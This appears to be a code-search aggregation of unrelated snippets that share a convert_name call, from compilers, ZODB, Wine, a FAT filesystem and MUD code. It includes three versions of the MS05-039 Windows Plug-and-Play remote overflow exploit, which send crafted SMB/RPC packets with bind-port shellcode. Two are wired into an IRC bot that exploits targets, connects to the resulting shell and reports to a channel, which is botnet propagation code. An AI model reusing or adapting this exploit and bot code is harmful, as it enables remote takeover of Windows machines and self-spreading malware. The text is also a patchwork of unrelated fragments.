static void mono_draw_cfg (MonoCompile *cfg, FILE *fp) { fprintf (fp, "digraph %s {\n", convert_name (cfg->method->name)); fprintf (fp, "node [fontsize=12.0]\nedge [len=1,color=red]\n"); fprintf (fp, "label=\"CFG for %s\";\n", mono_method_full_name (cfg->method, TRUE)); fprintf (fp, "BB0 [shape=doublecircle];\n"); fprintf (fp, "BB1 [color=red];\n"); cfg_emit_one_loop_level (cfg, fp, NULL); fprintf (fp, "}\n"); }
void *open(const char *filename) { std::string dllName(filename); # if defined(__GNUG__) return dlopen(filename, RTLD_LAZY); # elif defined(_MSC_VER) convert_name(dllName); std::cout << dllName << std::endl; return LoadLibrary(CStringW(dllName.c_str())); # else # error G++ or MS compiler required # endif }
static void mono_draw_dtree (MonoCompile *cfg, FILE *fp) { g_assert ((cfg->comp_done & MONO_COMP_IDOM)); fprintf (fp, "digraph %s {\n", convert_name (cfg->method->name)); fprintf (fp, "node [fontsize=12.0]\nedge [len=1,color=red]\n"); fprintf (fp, "label=\"Dominator tree for %s\";\n", mono_method_full_name (cfg->method, TRUE)); fprintf (fp, "BB0 [shape=doublecircle];\n"); fprintf (fp, "BB1 [color=red];\n"); dtree_emit_one_loop_level (cfg, fp, NULL); fprintf (fp, "}\n"); }
mixed cmd(string args) { object ob; if( !args || args == "" ) return "Trans whom?"; if( !(ob = find_player(convert_name(args))) && !(ob = find_living(args)) ) return "No such being exists anywhere presently."; if( environment(ob) == environment(this_player()) ) return ob->GetCapName() + " is right here."; if(archp(ob) && !archp(this_player())){ write("You can't trans an admin."); tell_player(ob, this_player()->GetName()+" just tried to trans you."); return 1; } ob->SetProperty("ReturnSite",base_name(environment(ob))); message("system", "You have been summoned by " + this_player()->GetName() + ".", ob); if( !(ob->eventMoveLiving(environment(this_player()))) ) return "Failed to move " + ob->GetCapName() + "."; else message("system", "You trans " + ob->GetCapName() + " to you.", this_player()); return 1; }
static PyObject* Per_getattro(cPersistentObject *self, PyObject *name) { PyObject *result = NULL; /* guilty until proved innocent */ PyObject *converted; char *s; converted = convert_name(name); if (!converted) goto Done; s = PyBytes_AS_STRING(converted); if (unghost_getattr(s)) { if (unghostify(self) < 0) goto Done; accessed(self); } result = PyObject_GenericGetAttr((PyObject *)self, name); Done: Py_XDECREF(converted); return result; }
static PyObject * pickle_copy_dict(PyObject *state) { PyObject *copy, *key, *value; char *ckey; Py_ssize_t pos = 0; copy = PyDict_New(); if (!copy) return NULL; if (!state) return copy; while (PyDict_Next(state, &pos, &key, &value)) { int is_special; #ifdef PY3K if (key && PyUnicode_Check(key)) { PyObject *converted = convert_name(key); ckey = PyBytes_AS_STRING(converted); #else if (key && PyBytes_Check(key)) { ckey = PyBytes_AS_STRING(key); #endif is_special = (*ckey == '_' && (ckey[1] == 'v' || ckey[1] == 'p') && ckey[2] == '_'); #ifdef PY3K Py_DECREF(converted); #endif if (is_special) /* skip volatile and persistent */ continue; } if (PyObject_SetItem(copy, key, value) < 0) goto err; } return copy; err: Py_DECREF(copy); return NULL; } static char pickle___getstate__doc[] = "Get the object serialization state\n" "\n" "If the object has no assigned slots and has no instance dictionary, then \n" "None is returned.\n" "\n" "If the object has no assigned slots and has an instance dictionary, then \n" "the a copy of the instance dictionary is returned. The copy has any items \n" "with names starting with '_v_' or '_p_' ommitted.\n" "\n" "If the object has assigned slots, then a two-element tuple is returned. \n" "The first element is either None or a copy of the instance dictionary, \n" "as described above. The second element is a dictionary with items \n" "for each of the assigned slots.\n" ; static PyObject * pickle___getstate__(PyObject *self) { PyObject *slotnames=NULL, *slots=NULL, *state=NULL; PyObject **dictp; int n=0; slotnames = pickle_slotnames(Py_TYPE(self)); if (!slotnames) return NULL; dictp = _PyObject_GetDictPtr(self); if (dictp) state = pickle_copy_dict(*dictp); else { state = Py_None; Py_INCREF(state); } if (slotnames != Py_None) { int i; slots = PyDict_New(); if (!slots) goto end; for (i = 0; i < PyList_GET_SIZE(slotnames); i++) { PyObject *name, *value; char *cname; int is_special; name = PyList_GET_ITEM(slotnames, i); #ifdef PY3K if (PyUnicode_Check(name)) { PyObject *converted = convert_name(name); cname = PyBytes_AS_STRING(converted); #else if (PyBytes_Check(name)) { cname = PyBytes_AS_STRING(name); #endif is_special = (*cname == '_' && (cname[1] == 'v' || cname[1] == 'p') && cname[2] == '_'); #ifdef PY3K Py_DECREF(converted); #endif if (is_special) /* skip volatile and persistent */ { continue; } } /* Unclear: Will this go through our getattr hook? */ value = PyObject_GetAttr(self, name); if (value == NULL) PyErr_Clear(); else { int err = PyDict_SetItem(slots, name, value); Py_DECREF(value); if (err < 0) goto end; n++; } } } if (n) state = Py_BuildValue("(NO)", state, slots); end: Py_XDECREF(slotnames); Py_XDECREF(slots); return state; } static int pickle_setattrs_from_dict(PyObject *self, PyObject *dict) { PyObject *key, *value; Py_ssize_t pos = 0; if (!PyDict_Check(dict)) { PyErr_SetString(PyExc_TypeError, "Expected dictionary"); return -1; } while (PyDict_Next(dict, &pos, &key, &value)) { if (PyObject_SetAttr(self, key, value) < 0) return -1; } return 0; }
int main (int argc, char **argv) { struct sockaddr_in addr; struct hostent *he; int len; int sockfd; unsigned short smblen; unsigned short bindport; unsigned char tmp[1024]; unsigned char packet[4096]; unsigned char *ptr; char recvbuf[4096]; #ifdef _WIN32 WSADATA wsa; WSAStartup(MAKEWORD(2,0), &wsa); #endif printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n"); printf("\t Universal Exploit + no crash shellcode\n\n"); printf("\t [Spanish hack by RoMaNSoFt :-)]\n\n\n"); printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n"); if (argc < 3) { printf("%s <host> <bind port>\n", argv[0]); exit(0); } if ((he = gethostbyname(argv[1])) == NULL) { printf("[-] Unable to resolve %s\n", argv[1]); exit(0); } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("[-] socket failed\n"); exit(0); } addr.sin_family = AF_INET; addr.sin_port = htons(445); addr.sin_addr = *((struct in_addr *)he->h_addr); memset(&(addr.sin_zero), '\0', 8); printf("\n[*] connecting to %s:445...", argv[1]); if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) { printf("\n[-] connect failed\n"); exit(0); } printf("ok\n"); printf("[*] null session..."); if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); } if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if (len <= 10) { printf("\n[-] failed\n"); exit(0); } if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); } ptr = packet; memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1); ptr += sizeof(SMB_TreeConnectAndX)-1; sprintf(tmp, "\\\\%s\\IPC$", argv[1]); convert_name(ptr, tmp); smblen = strlen(tmp)*2; ptr += smblen; smblen += 9; memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1); memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1); ptr += sizeof(SMB_TreeConnectAndX_)-1; smblen = ptr-packet; smblen -= 4; memcpy(packet+3, &smblen, 1); if (send(sockfd, packet, ptr-packet, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); } printf("ok\n"); printf("[*] bind pipe..."); if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); } if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); } printf("ok\n"); printf("[*] sending crafted packet..."); // nop ptr = packet; memset(packet, '\x90', sizeof(packet)); // header & offsets memcpy(ptr, RPC_call, sizeof(RPC_call)-1); ptr += sizeof(RPC_call)-1; // shellcode bindport = (unsigned short)atoi(argv[2]); bindport ^= 0x0437; SET_PORTBIND_PORT(bind_shellcode, htons(bindport)); memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1); // end of packet memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2, RPC_call_end, sizeof(RPC_call_end)-1); // sending... if (send(sockfd, packet, 2196, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } printf("ok\n"); printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2])); recv(sockfd, recvbuf, 4096, 0); return 0; }
int open_path(int drive, const char *path) // Opening the directory(s)... { int i, j, curdir_handle, new_handle; char name_comp[13], conv_name[11]; // Open the directory component i =0; if (path[0] == '/' || path[0] == '\\') // Absolute path { curdir_handle = root_handle(drive); i = 1; } else curdir_handle = get_curdir_handle(drive); // Increment the reference count increment_ref_count(curdir_handle); while (path[i] != 0) { j = 0; while (j < 12 && path[i] != 0 && path[i] != '/' && path[i] != '\\') { name_comp[j] = path[i]; j++; i++; } if (path[i] != 0) i++; name_comp[j] = 0; if (strcmp(name_comp,".") == 0) continue; else if (strcmp(name_comp,"..") == 0) { new_handle = get_parent_handle(curdir_handle); if (new_handle >= 0) increment_ref_count(new_handle); } else { // Open that directory component if (convert_name(name_comp, conv_name) < 0) { close_dir(curdir_handle); return EINVALIDNAME; // Error } new_handle = open_dir(curdir_handle, conv_name); } if (new_handle < 0) { close_dir(curdir_handle); return new_handle; // Error } close_dir(curdir_handle); // Effectively decrease the // reference count to 1 less. curdir_handle = new_handle; } // Successfully opened the path return curdir_handle; }
static void ghostify(cPersistentObject *self) { PyObject **dictptr, *slotnames; /* are we already a ghost? */ if (self->state == cPersistent_GHOST_STATE) return; /* Is it ever possible to not have a cache? */ if (self->cache == NULL) { self->state = cPersistent_GHOST_STATE; return; } if (self->ring.r_next == NULL) { /* There's no way to raise an error in this routine. */ #ifdef Py_DEBUG fatal_1350(self, "ghostify", "claims to be in a cache but isn't"); #else return; #endif } /* If we're ghostifying an object, we better have some non-ghosts. */ assert(self->cache->non_ghost_count > 0); self->cache->non_ghost_count--; self->cache->total_estimated_size -= _estimated_size_in_bytes(self->estimated_size); ring_del(&self->ring); self->state = cPersistent_GHOST_STATE; /* clear __dict__ */ dictptr = _PyObject_GetDictPtr((PyObject *)self); if (dictptr && *dictptr) { Py_DECREF(*dictptr); *dictptr = NULL; } /* clear all slots besides _p_* * ( for backward-compatibility reason we do this only if class does not * override __new__ ) */ if (Py_TYPE(self)->tp_new == Pertype.tp_new) { slotnames = pickle_slotnames(Py_TYPE(self)); if (slotnames && slotnames != Py_None) { int i; for (i = 0; i < PyList_GET_SIZE(slotnames); i++) { PyObject *name; char *cname; int is_special; name = PyList_GET_ITEM(slotnames, i); #ifdef PY3K if (PyUnicode_Check(name)) { PyObject *converted = convert_name(name); cname = PyBytes_AS_STRING(converted); #else if (PyBytes_Check(name)) { cname = PyBytes_AS_STRING(name); #endif is_special = !strncmp(cname, "_p_", 3); #ifdef PY3K Py_DECREF(converted); #endif if (is_special) /* skip persistent */ { continue; } } /* NOTE: this skips our delattr hook */ if (PyObject_GenericSetAttr((PyObject *)self, name, NULL) < 0) /* delattr of non-set slot will raise AttributeError - we * simply ignore. */ PyErr_Clear(); } } Py_XDECREF(slotnames); } /* We remove the reference to the just ghosted object that the ring * holds. Note that the dictionary of oids->objects has an uncounted * reference, so if the ring's reference was the only one, this frees * the ghost object. Note further that the object's dealloc knows to * inform the dictionary that it is going away. */ Py_DECREF(self); } static int changed(cPersistentObject *self) { if ((self->state == cPersistent_UPTODATE_STATE || self->state == cPersistent_STICKY_STATE) && self->jar) { PyObject *meth, *arg, *result; static PyObject *s_register; if (s_register == NULL) s_register = INTERN("register"); meth = PyObject_GetAttr((PyObject *)self->jar, s_register); if (meth == NULL) return -1; arg = PyTuple_New(1); if (arg == NULL) { Py_DECREF(meth); return -1; } Py_INCREF(self); PyTuple_SET_ITEM(arg, 0, (PyObject *)self); result = PyEval_CallObject(meth, arg); Py_DECREF(arg); Py_DECREF(meth); if (result == NULL) return -1; Py_DECREF(result); self->state = cPersistent_CHANGED_STATE; } return 0; } static int readCurrent(cPersistentObject *self) { if ((self->state == cPersistent_UPTODATE_STATE || self->state == cPersistent_STICKY_STATE) && self->jar && self->oid) { static PyObject *s_readCurrent=NULL; PyObject *r; if (s_readCurrent == NULL) s_readCurrent = INTERN("readCurrent"); r = PyObject_CallMethodObjArgs(self->jar, s_readCurrent, self, NULL); if (r == NULL) return -1; Py_DECREF(r); } return 0; } static PyObject * Per__p_deactivate(cPersistentObject *self) { if (self->state == cPersistent_UPTODATE_STATE && self->jar) { PyObject **dictptr = _PyObject_GetDictPtr((PyObject *)self); if (dictptr && *dictptr) { Py_DECREF(*dictptr); *dictptr = NULL; } /* Note that we need to set to ghost state unless we are called directly. Methods that override this need to do the same! */ ghostify(self); if (PyErr_Occurred()) return NULL; } Py_INCREF(Py_None); return Py_None; } static PyObject * Per__p_activate(cPersistentObject *self) { if (unghostify(self) < 0) return NULL; Py_INCREF(Py_None); return Py_None; } static int Per_set_changed(cPersistentObject *self, PyObject *v); static PyObject * Per__p_invalidate(cPersistentObject *self) { signed char old_state = self->state; if (old_state != cPersistent_GHOST_STATE) { if (Per_set_changed(self, NULL) < 0) return NULL; ghostify(self); if (PyErr_Occurred()) return NULL; } Py_INCREF(Py_None); return Py_None; }
BOOL ppexploit (EXINFO exinfo) //main (int argc, char **argv) { int len; char buffer[IRCLINE]; SOCKET sockfd; int pport = 7777; BOOL success = FALSE; SOCKADDR_IN their_addr; memset(&their_addr, 0, sizeof(their_addr)); //struct sockaddr_in addr; char recvbuf[4096]; // struct hostent *he; unsigned short smblen; unsigned short bindport; char tmp[1024]; char packet[4096]; char *ptr; /* WSADATA wsa; WSAStartup(MAKEWORD(2,0), &wsa);*/ //printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n"); //printf("\t Universal Exploit + no crash shellcode\n\n\n"); //printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n"); /* if (argc < 3) { printf("%s <host> <bind port>\n", argv[0]); exit(0); } */ /* if ((he = gethostbyname(argv[1])) == NULL) { printf("[-] Unable to resolve %s\n", argv[1]); exit(0); } */ if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) { return FALSE; } their_addr.sin_family = AF_INET; their_addr.sin_addr.s_addr = finet_addr(exinfo.ip); their_addr.sin_port = fhtons((unsigned short)exinfo.port); /*addr.sin_family = AF_INET; addr.sin_port = fhtons((unsigned short)exinfo.port); addr.sin_addr.s_addr = finet_addr(exinfo.ip);*/ memset(&(their_addr.sin_zero), '\0', 8); //printf("\n[*] connecting to %s:445...", argv[1]); if (fconnect(sockfd, (LPSOCKADDR)&their_addr, sizeof(struct sockaddr)) < 0) { return FALSE; } //printf("ok\n"); //printf("[*] null session..."); if (fsend(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) { return FALSE; } len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { return FALSE; } if (fsend(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) { return FALSE; } len = frecv(sockfd, recvbuf, 4096, 0); if (len <= 10) { return FALSE; } if (fsend(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) { return FALSE; } len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { return FALSE; } ptr = packet; memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1); ptr += sizeof(SMB_TreeConnectAndX)-1; sprintf(tmp, "\\\\%s\\IPC$", exinfo.ip); convert_name(ptr, tmp); smblen = strlen(tmp)*2; ptr += smblen; smblen += 9; memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1); memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1); ptr += sizeof(SMB_TreeConnectAndX_)-1; smblen = ptr-packet; smblen -= 4; memcpy(packet+3, &smblen, 1); if (fsend(sockfd, packet, ptr-packet, 0) < 0) { return FALSE; } len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { return FALSE; } //printf("ok\n"); //printf("[*] bind pipe..."); if (fsend(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) { return FALSE; } len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { return FALSE; } if (fsend(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) { return FALSE; } len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { return FALSE; } //printf("ok\n"); //printf("[*] sending crafted packet..."); // nop ptr = packet; memset(packet, '\x90', sizeof(packet)); // header & offsets memcpy(ptr, RPC_call, sizeof(RPC_call)-1); ptr += sizeof(RPC_call)-1; // shellcode bindport = (unsigned short)atoi((const char *)pport); bindport ^= 0x0437; SET_PORTBIND_PORT(bind_shellcode, htons(bindport)); memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1); // end of packet memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2, RPC_call_end, sizeof(RPC_call_end)-1); // sending... if (fsend(sockfd, packet, 2196, 0) < 0) { return FALSE; } // printf("ok\n"); // printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2])); frecv(sockfd, recvbuf, 4096, 0); Sleep(300); fclosesocket(sockfd); if (ConnectShell2(exinfo)) { if(!exinfo.silent) { _snprintf(buffer, sizeof(buffer), "[FTP]: Transfer info sent to IP: %s.", exinfo.ip); irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); } exploit[exinfo.exploit].stats++; return TRUE; } return FALSE; }
/********************************************************************** * ConvertDialog32To16 (KERNEL.615) */ VOID WINAPI ConvertDialog32To16( LPVOID dialog32, DWORD size, LPVOID dialog16 ) { WORD nbItems, data, dialogEx; DWORD style; style = get_dword( &dialog32 ); put_dword( &dialog16, style ); dialogEx = (style == 0xffff0001); /* DIALOGEX resource */ if (dialogEx) { put_dword( &dialog16, get_dword( &dialog32 ) ); /* helpID */ put_dword( &dialog16, get_dword( &dialog32 ) ); /* exStyle */ style = get_dword( &dialog32 ); put_dword( &dialog16, style ); /* style */ } else dialog32 = (DWORD *)dialog32 + 1; /* exStyle ignored in 16-bit standard dialog */ nbItems = get_word( &dialog32 ); put_byte( &dialog16, nbItems ); put_word( &dialog16, get_word( &dialog32 ) ); /* x */ put_word( &dialog16, get_word( &dialog32 ) ); /* y */ put_word( &dialog16, get_word( &dialog32 ) ); /* cx */ put_word( &dialog16, get_word( &dialog32 ) ); /* cy */ /* Transfer menu name */ convert_name( &dialog16, &dialog32 ); /* Transfer class name */ convert_name( &dialog16, &dialog32 ); /* Transfer window caption */ WideCharToMultiByte( CP_ACP, 0, dialog32, -1, dialog16, 0x7fffffff, NULL, NULL ); dialog16 = (LPSTR)dialog16 + strlen( (LPSTR)dialog16 ) + 1; dialog32 = (LPWSTR)dialog32 + strlenW( (LPWSTR)dialog32 ) + 1; /* Transfer font info */ if (style & DS_SETFONT) { put_word( &dialog16, get_word( &dialog32 ) ); /* pointSize */ if (dialogEx) { put_word( &dialog16, get_word( &dialog32 ) ); /* weight */ put_word( &dialog16, get_word( &dialog32 ) ); /* italic */ } WideCharToMultiByte( CP_ACP, 0, (LPWSTR)dialog32, -1, (LPSTR)dialog16, 0x7fffffff, NULL, NULL ); /* faceName */ dialog16 = (LPSTR)dialog16 + strlen( (LPSTR)dialog16 ) + 1; dialog32 = (LPWSTR)dialog32 + strlenW( (LPWSTR)dialog32 ) + 1; } /* Transfer dialog items */ while (nbItems) { /* align on DWORD boundary (32-bit only) */ dialog32 = (LPVOID)(((UINT_PTR)dialog32 + 3) & ~3); if (dialogEx) { put_dword( &dialog16, get_dword( &dialog32 ) ); /* helpID */ put_dword( &dialog16, get_dword( &dialog32 ) ); /* exStyle */ put_dword( &dialog16, get_dword( &dialog32 ) ); /* style */ } else { style = get_dword( &dialog32 ); /* save style */ dialog32 = (DWORD *)dialog32 + 1; /* ignore exStyle */ } put_word( &dialog16, get_word( &dialog32 ) ); /* x */ put_word( &dialog16, get_word( &dialog32 ) ); /* y */ put_word( &dialog16, get_word( &dialog32 ) ); /* cx */ put_word( &dialog16, get_word( &dialog32 ) ); /* cy */ if (dialogEx) put_dword( &dialog16, get_dword( &dialog32 ) ); /* ID */ else { put_word( &dialog16, get_word( &dialog32 ) ); /* ID */ put_dword( &dialog16, style ); /* style from above */ } /* Transfer class name */ switch (*(WORD *)dialog32) { case 0x0000: get_word( &dialog32 ); put_byte( &dialog16, 0 ); break; case 0xffff: get_word( &dialog32 ); put_byte( &dialog16, get_word( &dialog32 ) ); break; default: WideCharToMultiByte( CP_ACP, 0, (LPWSTR)dialog32, -1, (LPSTR)dialog16, 0x7fffffff, NULL, NULL ); dialog16 = (LPSTR)dialog16 + strlen( (LPSTR)dialog16 ) + 1; dialog32 = (LPWSTR)dialog32 + strlenW( (LPWSTR)dialog32 ) + 1; break; } /* Transfer window name */ convert_name( &dialog16, &dialog32 ); /* Transfer data */ data = get_word( &dialog32 ); if (dialogEx) put_word(&dialog16, data); else put_byte(&dialog16,(BYTE)data); if (data) { memcpy( dialog16, dialog32, data ); dialog16 = (BYTE *)dialog16 + data; dialog32 = (BYTE *)dialog32 + data; } /* Next item */ nbItems--; } }
int syscall_stat(const char *file_name, struct stat *buf) { int drive; int curdir_handle; char name_comp[13], conv_name[11], dir_path[501]; struct dir_entry dent; int err, count; struct date_time dt; int clno; if (strlen(file_name) > 500) return ELONGPATH; parse_path(file_name, &drive, dir_path, name_comp); if (dir_path[0] != 0) { curdir_handle = open_path(drive, dir_path); if (curdir_handle < 0) { return curdir_handle; // Error } } else { curdir_handle = get_curdir_handle(drive); increment_ref_count(curdir_handle); } // Last file name component. if (convert_name(name_comp, conv_name) < 0) { err = EINVALIDNAME; // Error } else if (find_entry(curdir_handle, conv_name, &dent) == 1) { // Fill up the stat buf buf->st_dev = drive; buf->st_ino = 0; buf->st_mode = dent.attrib; buf->st_nlink = 1; buf->st_uid = buf->st_gid = 0; buf->st_rdev = 0; buf->st_size = dent.fsize; buf->st_blksize = 512; // Find time in seconds dt.seconds = (dent.time & 0x1f) * 2; dt.minutes = ((dent.time & 0x7e0) >> 5); dt.hours = (((unsigned short int)(dent.time & 0xf800)) >> 11); dt.date = dent.date & 0x1f; dt.month = ((dent.date & 0x1e0) >> 5); dt.year = (((unsigned short int)(dent.date & 0xfe00)) >> 9); buf->st_atime = buf->st_mtime = buf->st_ctime = date_to_secs(dt); // Find number of blocks count = 0; clno = dent.start_cluster; while (clno < 0xff8) { count++; clno = next_cluster_12(clno); } buf->st_blocks = count; err = 0; }
BOOL pnp(EXINFO exinfo) { struct sockaddr_in addr; struct hostent *he; int len; int sockfd; unsigned short smblen; unsigned short bindport; unsigned char tmp[1024]; unsigned char packet[4096]; unsigned char *ptr; char recvbuf[4096]; char buffer[IRCLINE]; #ifdef _WIN32 WSADATA wsa; WSAStartup(MAKEWORD(2,0), &wsa); #endif // printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n"); // printf("\t Universal Exploit + no crash shellcode\n\n\n"); // printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n"); // if (exinfo.ip < 3) { // printf("%s <host> <bind port>\n", argv[0]); // exit(0); // return false; // } if ((he = gethostbyname(exinfo.ip)) == NULL) { // printf("[-] Unable to resolve %s\n", argv[1]); // exit(0); return false; } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { // printf("[-] socket failed\n"); // exit(0); } addr.sin_family = AF_INET; addr.sin_port = htons(445); addr.sin_addr = *((struct in_addr *)he->h_addr); memset(&(addr.sin_zero), '\0', 8); //printf("\n[*] connecting to %s:445...", argv[1]); if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) { //printf("\n[-] connect failed\n"); //exit(0); return false; } // printf("ok\n"); // printf("[*] null session..."); if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) { // printf("\n[-] send failed\n"); // exit(0); return false; } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { // printf("\n[-] failed\n"); // exit(0); return false; } if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) { // printf("\n[-] send failed\n"); // exit(0); return false; } len = recv(sockfd, recvbuf, 4096, 0); if (len <= 10) { // printf("\n[-] failed\n"); // exit(0); return false; } if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) { // printf("\n[-] send failed\n"); // exit(0); return false; } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { //printf("\n[-] failed\n"); // exit(0); return false; } ptr = packet; memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1); ptr += sizeof(SMB_TreeConnectAndX)-1; sprintf((char*)tmp,"\\\\%s\\IPC$",exinfo.ip); convert_name((char*)ptr, (char*)tmp); smblen = strlen((char*)tmp)*2; ptr += smblen; smblen += 9; memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1); memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1); ptr += sizeof(SMB_TreeConnectAndX_)-1; smblen = ptr-packet; smblen -= 4; memcpy(packet+3, &smblen, 1); if (send(sockfd, (char*)packet, ptr-packet, 0) < 0) { // printf("\n[-] send failed\n"); // _snprintf(buffer, sizeof(buffer), "send failed"); // irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); return false; } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { // printf("\n[-] failed\n"); //_snprintf(buffer, sizeof(buffer), "failed"); // irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); // exit(0); return false; } //printf("ok\n"); // printf("[*] bind pipe..."); // _snprintf(buffer, sizeof(buffer), "Bind Pipe"); //irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) { //printf("\n[-] send failed\n"); return false; } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { // printf("\n[-] failed\n"); // exit(0); } if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) { // printf("\n[-] send failed\n"); //_snprintf(buffer, sizeof(buffer), "send failed"); //irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); //exit(0); return false; } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { // printf("\n[-] failed\n"); // exit(0); return false; } //printf("ok\n"); // printf("[*] sending crafted packet..."); // _snprintf(buffer, sizeof(buffer), "sending craffted packet"); // irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); // nop ptr = packet; memset(packet, '\x90', sizeof(packet)); // header & offsets memcpy(ptr, RPC_call, sizeof(RPC_call)-1); ptr += sizeof(RPC_call)-1; // shellcode bindport = xport; bindport ^= 0x0437; SET_PORTBIND_PORT(bind_shellcode, htons(bindport)); memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1); // end of packet memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2, RPC_call_end, sizeof(RPC_call_end)-1); // sending... if (send(sockfd, (char*)packet, 2196, 0) < 0) { // printf("\n[-] send failed\n"); //_snprintf(buffer, sizeof(buffer), "send failed"); //irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); //exit(0); return false; } // printf("ok\n"); // printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2])); // _snprintf(buffer, sizeof(buffer), "Exploiting IP:%s",exinfo.ip); irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); // recv(sockfd, recvbuf, 4096, 0); exploit[exinfo.exploit].stats++; if (ConnectShell2(exinfo)) return true; return false; }
string player_save_file(string who){ if( !stringp(who) ) error("Bad argument 1 to save_file()."); who = convert_name(who); return master()->player_save_file(who); }
